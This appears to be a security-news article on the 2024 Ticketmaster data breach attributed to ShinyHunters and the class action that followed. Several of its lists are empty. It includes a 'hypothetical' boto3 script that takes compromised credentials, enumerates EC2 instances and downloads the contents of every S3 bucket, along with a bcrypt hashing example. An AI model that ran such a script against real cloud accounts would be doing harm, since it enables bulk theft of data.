Ticketmaster faces a class action lawsuit after 560 million customers' data was exposed in a major breach by ShinyHunters. Discover the details and implications now.

Continue reading
On May 28, 2024, the hacker group ShinyHunters reportedly compromised the personal information of 560 million Ticketmaster customers. The breach, now subject to a proposed class action lawsuit, highlights severe lapses in cybersecurity protocols at Ticketmaster and its parent company, Live Nation Entertainment.
This Threatfeed dissects the technical, legal, and operational failures leading to this incident, leveraging industry standards and cybersecurity practices.
The hacker group ShinyHunters claims responsibility for the breach. They have listed the stolen data on dark-web forums, including BreachForums and Exploit, for $500,000. The compromised data spans from 2012 to 2024, including:
ShinyHunters reportedly accessed Ticketmaster's data through AWS instances by exploiting a Managed Service Provider (MSP).
This method suggests a sophisticated understanding of cloud infrastructure and the ability to navigate security controls within MSP environments.
BleepingComputer reviewed samples of the stolen data, which appears to be authentic. Despite multiple requests, Ticketmaster has not confirmed the breach. The FBI has also declined to comment on any ongoing investigations related to these claims.
Plaintiffs Cynthia Ryan and Rosalia Garcia have filed a lawsuit in the U.S. District Court for the Central District of California. They claim Ticketmaster's negligence in implementing adequate cybersecurity measures led to the breach. The lawsuit alleges violations of:
The plaintiffs seek:
The breach underscores several critical cybersecurity failures:
Ticketmaster's failure to protect consumer data potentially violates several regulatory requirements, including:
The breach likely involved a multi-step attack on Ticketmaster's AWS infrastructure. Below is a hypothetical example of how such an attack might be executed:
import boto3
from botocore.exceptions import NoCredentialsError
# Initial access using compromised MSP credentials
session = boto3.Session(
aws_access_key_id='ACCESS_KEY',
aws_secret_access_key='SECRET_KEY',
region_name='us-west-2'
) ec2_client = session.client('ec2')
response = ec2_client.describe_instances()
for reservation in response['Reservations']:
for instance in reservation['Instances']:
print(f"Instance ID: {instance['InstanceId']}")
print(f"Public DNS: {instance['PublicDnsName']}") s3_client = session.client('s3')
buckets = s3_client.list_buckets()
for bucket in buckets['Buckets']:
bucket_name = bucket['Name']
print(f"Found bucket: {bucket_name}")
objects = s3_client.list_objects_v2(Bucket=bucket_name)
for obj in objects.get('Contents', []):
print(f"Downloading: {obj['Key']}")
s3_client.download_file(bucket_name, obj['Key'], f"/local/path/{obj['Key']}")To enhance data security, robust hashing algorithms like bcrypt should be employed:
import bcrypt
# Hash a password
password = b"supersecretpassword"
hashed = bcrypt.hashpw(password, bcrypt.gensalt())
print(f"Hashed password: {hashed}")
# Verify password
if bcrypt.checkpw(password, hashed):
print("Password match")
else:
print("Password does not match")
A third-party software flaw inside one of Japan's largest telcos exposed login credentials for up to 14.2 million email accounts across six ISPs. The passwords? Some were hashed. Some may not have been